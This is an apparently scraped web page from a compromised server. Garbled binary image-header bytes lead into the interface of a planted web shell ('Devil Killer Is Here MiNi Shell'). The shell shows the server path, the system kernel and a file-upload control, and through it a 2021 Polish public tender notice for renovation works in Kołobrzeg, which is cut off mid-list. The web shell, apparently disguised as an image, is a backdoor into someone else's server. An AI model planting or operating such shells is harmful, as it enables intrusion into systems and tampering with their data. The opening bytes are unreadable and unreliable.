JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210803/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210803/0013502701-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00135027 z dnia 2021-08-03</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Wykonywanie robót remontowo-budowlanych i modernizacji lokali mieszkalnych ,lokali użytkowych i części wspólnych na nieruchomościach stanowiących zasób Gminy Miasto Kołobrzeg". </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">KOŁOBRZESKIE TOWARZYSTWO BUDOWNICTWA SPOŁECZNEGO SPÓŁKA Z OGRANICZONĄ ODPOWIEDZIALNOŚCIĄ</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 330920104</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Artyleryjska 3</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kołobrzeg</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">78-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL426 - Koszaliński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">94 34 474 71</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">94 35 425 74</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">biuro@ktbs.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.ktbs.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - inne państwowe i samorządowe osoby prawne utworzone na podstawie odrębnych ustaw w celu wykonywania zadań publicznych</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Budownictwo i obiekty komunalne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Wykonywanie robót remontowo-budowlanych i modernizacji lokali mieszkalnych ,lokali użytkowych i części wspólnych na nieruchomościach stanowiących zasób Gminy Miasto Kołobrzeg". </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-2cd784f0-f41e-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00135027</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-08-03</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://kolobrzeskietbs.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://kolobrzeskietbs.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zgodnie z treścią rozdziału XI i XII SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">zgodnie z treścią rozdziału I SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DOZ/03/2021/REMONTY BUDYNKI GMK</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ 1 - roboty remontowo-budowlane w branży ogólnobudowlanej i sanitarnej<br/>zakres robót remontowo-budowlanych w branży ogólnobudowlanej i sanitarnej<br/>dotyczących 1 części przedmiotu zamówienia:<br/>1) Remonty kapitalne oraz bieżące wraz z odnowieniem i modernizacją. Zakres robót<br/>przewiduje wymianę i naprawę tynków, odnowienie powłok malarskich, wymianę stolarki<br/>okiennej i drzwiowej wraz okuciami, remont podłóg i posadzek w zakresie wzmocnienia lub<br/>wymiany uszkodzonych elementów z wykorzystaniem nowych posadzek, roboty<br/>hydrauliczne związane z remontem lokali (wymiana części rurarzu, wymiana armatury<br/>sanitarnej, naprawa i wymiana instalacji gazowych).<br/>2) Przy remoncie stropów drewnianych przewiduje się wymianę poszczególnych elementów<br/>lub ich wzmocnienie, odgrzybienie, impregnację i izolację.<br/>3) Przy robotach stolarskich możliwe są wymiany poszczególnych elementów stolarki okiennej<br/>i drzwiowej wraz z wymianą okuć na nowe oraz szklenie otworów okiennych i drzwiowych.<br/>4) W robotach malarskich przewiduje się malowanie elementów metalowych i drewnianych<br/>farbami do tego typu przeznaczonymi, szpachlowanie – wykonanie gładzi gipsowych.<br/>5) W sytuacji gdy lokal jest wyposażony w piece kaflowe lub trzony kuchenne przewiduje się<br/>ich przestawienie oraz naprawę średnią lub główną wraz z wymianą uszkodzonego osprzętu<br/>piecowego.<br/>6) Roboty kowalsko- ślusarskie będą występować w lokalu, który wyposażony jest w elementy<br/>metalowe które podlegać będą remoncie i odnowieniu.<br/>7) W obiektach niepodpiwniczonych przy konieczności wykonania izolacji wystąpią prace<br/>ziemne i prace izolacyjne.<br/>8) Ponadto przewiduje się wywóz gruzu i odpadów po wykonaniu robót ogólnobudowlanych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2021-10-01 do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje możliwość udzielania zamówień podobnych, o których mowa w art. 214 ust. 1 pkt 7 ustawy Pzp, polegających na powtórzeniu podobnych robót, zgodnych z przedmiotem zamówienia podstawowego, do 30 % wartości szacunkowej zamówienia podstawowego. Podstawą ustalenia warunków realizacji zamówienia podobnego jest umowa podstawowa oraz przeprowadzone z wykonawcą negocjacje.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował poniżej podanymi kryteriami:<br/>1. Cena -stawka roboczogodziny brutto ( SR ) 80%<br/>2.Gwarancja(G) 20%<br/>Punktacja :<br/>1. Cena-Stawka roboczogodziny brutto 80 pkt<br/>2. Gwarancja 20 pkt.<br/><br/>2. Wzory obliczenia punktacji:<br/>1. Stawka roboczogodziny brutto SR:<br/>Sposób obliczenia przez Zamawiającego kryterium ceny :<br/> najniższa SR z ofert<br/>Ilość punktów za stawkę roboczogodziny brutto (SR)= ----------------------------x 80 pkt SR z oferty badanej<br/>2. Gwarancja G:<br/>Zamawiający wymaga udzielenia gwarancji na wykonane roboty remontowo-budowlane ( w zakresie dotyczącym indywidualnie każdej roboty ) na minimum 24 miesiące, w związku z czym zaoferowany przez wykonawcę okres gwarancji nie może być krótszy niż 36 miesiące. Oferty proponujące gwarancje krótszą niż 36 miesięcy będą odrzucane. Proponowany okres gwarancji należy wskazać w miesiącach. Wykonawca , który zaoferuje okres gwarancji powyżej 36 miesięcy<br/>do 48 miesięcy otrzyma 10 pkt. Wykonawca , który zaoferuje okres gwarancji powyżej 48 miesięcy otrzyma 40 pkt.<br/>Gwarancja:<br/>powyżej 36 miesięcy do 48 miesięcy - 10 pkt<br/>powyżej 48 miesięcy - 20 pkt<br/>3. Ocena oferty OF<br/>OF = SR + G<br/>Objaśnienia:<br/>OF -ocena oferty<br/>SR –Stawka roboczogodziny<br/>G –Gwarancja<br/>Ilość punktów stanowi podstawę wyboru najkorzystniejszej oferty wygrywa ta, która uzyska największą ilość punktów. Ocenie punktowej zostają poddane tylko oferty tych wykonawców, którzy spełniają warunki udziału w postępowaniu, jak i te oferty, które odpowiadają wszystkim wymaganiom określonym w SWZ i Prawie zamówień publicznych. Maksymalna ilość punktów, jaką może otrzymać oferta wynosi 100.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ 2 – roboty remontowo-budowlane w branży elektrycznej<br/>zakres robót remontowo-budowlanych w branży elektrycznej dotyczących 2 części przedmiotu zamówienia:<br/>Remonty kapitalne oraz bieżące wraz z odnowieniem i modernizacją. Zakres robót przewiduje:<br/>demontaż instalacji nienadającej się do dalszej eksploatacji, demontaż wyłączników, przełączników,gniazd wtykowych, tablic licznikowych i zabezpieczeń. Wykucie bruzd bez względu na podłoże,<br/>montaż przewodów instalacyjnych, puszek instalacyjnych, wykonanie tynku na bruzdach z<br/>przewodami, zamontowanie nowego osprzętu wyłączników, przełączników, gniazd, tablic,<br/>kuchenek elektrycznych, bojlerów, zabezpieczeń. Wykonanie pomiarów nowej instalacji. Ponadtoprzewiduje się wywóz gruzu i odpadów po wykonaniu robót instalacyjnych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45310000-3 - Roboty instalacyjne elektryczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2021-10-01 do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje możliwość udzielania zamówień podobnych, o których mowa w art. 214 ust. 1 pkt 7 ustawy Pzp, polegających na powtórzeniu podobnych robót, zgodnych z<br/>przedmiotem zamówienia podstawowego, do 30 % wartości szacunkowej zamówienia podstawowego. Podstawą ustalenia warunków realizacji zamówienia podobnego jest umowa podstawowa oraz przeprowadzone z wykonawcą negocjacje.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował poniżej podanymi kryteriami:<br/>1. Cena -stawka roboczogodziny brutto ( SR ) 80%<br/>2.Gwarancja(G) 20%<br/>Punktacja :<br/>1. Cena-Stawka roboczogodziny brutto 80 pkt<br/>2. Gwarancja 20 pkt.<br/><br/>2. Wzory obliczenia punktacji:<br/>1. Stawka roboczogodziny brutto SR:<br/>Sposób obliczenia przez Zamawiającego kryterium ceny :<br/> najniższa SR z ofert<br/>Ilość punktów za stawkę roboczogodziny brutto (SR)= ----------------------------x 80 pkt SR z oferty badanej<br/>2. Gwarancja G:<br/>Zamawiający wymaga udzielenia gwarancji na wykonane roboty remontowo-budowlane ( w zakresie dotyczącym indywidualnie każdej roboty ) na minimum 24 miesiące, w związku z czym zaoferowany przez wykonawcę okres gwarancji nie może być krótszy niż 36 miesiące. Oferty proponujące gwarancje krótszą niż 36 miesięcy będą odrzucane. Proponowany okres gwarancji należy wskazać w miesiącach. Wykonawca , który zaoferuje okres gwarancji powyżej 36 miesięcy<br/>do 48 miesięcy otrzyma 10 pkt. Wykonawca , który zaoferuje okres gwarancji powyżej 48 miesięcy otrzyma 40 pkt.<br/>Gwarancja:<br/>powyżej 36 miesięcy do 48 miesięcy - 10 pkt<br/>powyżej 48 miesięcy - 20 pkt<br/>3. Ocena oferty OF<br/>OF = SR + G<br/>Objaśnienia:<br/>OF -ocena oferty<br/>SR –Stawka roboczogodziny<br/>G –Gwarancja<br/>Ilość punktów stanowi podstawę wyboru najkorzystniejszej oferty wygrywa ta, która uzyska największą ilość punktów. Ocenie punktowej zostają poddane tylko oferty tych wykonawców, którzy spełniają warunki udziału w postępowaniu, jak i te oferty, które odpowiadają wszystkim wymaganiom określonym w SWZ i Prawie zamówień publicznych. Maksymalna ilość punktów, jaką może otrzymać oferta wynosi 100.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit c</p> <p class="mb-0">Art. 109 ust. 1 pkt 3</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia może się ubiegać Wykonawca, który spełnia warunek udziału w postępowaniu dotyczący zdolności technicznej lub zawodowej tj. wykaże, że:<br/>1) a) zrealizował w sposób należyty w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, roboty remontowe w branży na którą składa ofertę, zgodnie z opisem przedmiotu zamówienia dla tej branży, w ilości<br/>przepracowanych roboczogodzin, przy czym minimalna ilość roboczogodzin dla części, na którą składa ofertę musi wynosić :<br/>CZĘŚĆ 1 - roboty remontowo-budowlane w branży ogólnobudowlanej i sanitarnej – 20000 roboczogodzin<br/>CZĘŚĆ 2 - roboty remontowo-budowlane w branży elektrycznej - 6000 roboczogodzin<br/>z załączeniem dowodów określających czy te roboty zostały wykonane lub są wykonywanenależycie przy czym dowodami , o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów,inne dokumenty.<br/>2) b) dysponuje osobami dla części na którą składa ofertę co najmniej:<br/>CZĘŚĆ 1 - roboty remontowo budowlane w branży ogólnobudowlanej i sanitarnej co najmniej jedna osoba posiadającego uprawnienia kwalifikacyjne do wykonywania prac na wysokościach oraz jedna osoba posiadająca uprawnienia kwalifikacyjne do wykonywania robót instalacyjnych w branży sanitarnej<br/>CZĘŚĆ 2 - roboty remontowo budowlane w branży elektrycznej co najmniej jedna osoba posiadająca uprawnienia kwalifikacyjne co najmniej do 1 KV E i D (eksploatacyjno pomiarowe i dozorowe).<br/>c) dysponuje narzędziami, wyposażeniem zakładu lub urządzeń technicznych dostępnych wykonawcy w celu wykonania niniejszego zamówienia. Zamawiający uzna za spełniony warunek jeżeli wykonawca wykaże dla części na którą składa ofertę co najmniej:<br/>CZĘŚĆ 1 - roboty remontowo budowlane w branży ogólnobudowlanej i sanitarnej zestaw rusztowań min. 50m2, betoniarka 1 szt., środek transportowy o ładowności 0,9 t, podnośnik samochodowy o długości ramienia o minimum 20m, spirala elektryczna 1 szt.<br/>CZĘŚĆ 2 - roboty remontowo budowlane w branży elektrycznej co najmniej urządzenia pomiarowe do pomiaru oporności , rezystencji, napięcia z aktualna homologacją 1 szt. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Dokumenty wymagane przez zamawiającego, które należy złożyć składając ofertę:<br/>1) formularz oferty, według wzoru stanowiącego załącznik nr 1 do SWZ;<br/>2) odpis lub informacja z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru, w celu potwierdzenia, że osoba działająca w imieniu (odpowiednio: wykonawcy lub podmiotu udostępniającego zasoby) jest umocowana do jego reprezentowania; wykonawca nie jest zobowiązany do złożenia ww. dokumentów, jeżeli zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz<br/>danych, o ile wykonawca wskazał w załączniku nr 1 do SWZ (formularz oferty) dane umożliwiające dostęp do tych dokumentów.<br/>3) pełnomocnictwa lub inne dokumenty potwierdzające umocowanie do reprezentowania (odpowiednio: wykonawcy, podmiotu udostępniającego zasoby, wykonawców wspólnie ubiegających się o udzielenie zamówienia), jeżeli w imieniu (odpowiednio: wykonawcy, podmiotu udostępniającego zasoby wykonawców wspólnie ubiegających się o udzielenie zamówienia) działa<br/>osoba, której umocowanie do reprezentowania nie wynika z dokumentów, o których mowa w pkt 1 ppkt 2)<br/>4) oświadczenie o niepodleganiu wykluczeniu, według wzoru stanowiącego załącznik nr 2 do SWZ;<br/>W przypadku wspólnego ubiegania się wykonawców o udzielenie zamówienia ww. dokument składa każdy z wykonawców.<br/>5) oświadczenie o spełnianiu warunków udziału w postępowaniu, według wzoru<br/>stanowiącego załącznik nr 3 do SWZ; W przypadku wspólnego ubiegania się wykonawców o udzielenie zamówienia ww. dokument składa każdy z wykonawców, w zakresie, w jakim wykazuje spełnianie warunków udziału w<br/>postępowaniu.<br/>6) oświadczenie wykonawcy o poleganiu na zdolnościach lub sytuacji podmiotów<br/>udostępniających zasoby, według wzoru stanowiącego załącznik nr 4 do SWZ;<br/>Uwaga!!! Ww. dokument należy złożyć tylko wtedy, gdy wykonawca polega na zdolnościach lub sytuacji podmiotu udostępniającego zasoby.<br/>7) zobowiązanie podmiotu udostępniającego zasoby do oddania wykonawcy do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia wraz z oświadczeniem podmiotu udostępniającego zasoby, potwierdzającym brak podstaw wykluczenia tego podmiotu oraz spełnianie warunków udziału w postępowaniu, w zakresie, w jakim wykonawca powołuje się na jego zasoby (wg wzoru stanowiącego załącznik nr 4 do SWZ); zobowiązanie podmiotu udostępniającego zasoby może być zastąpione innym podmiotowym środkiem dowodowym 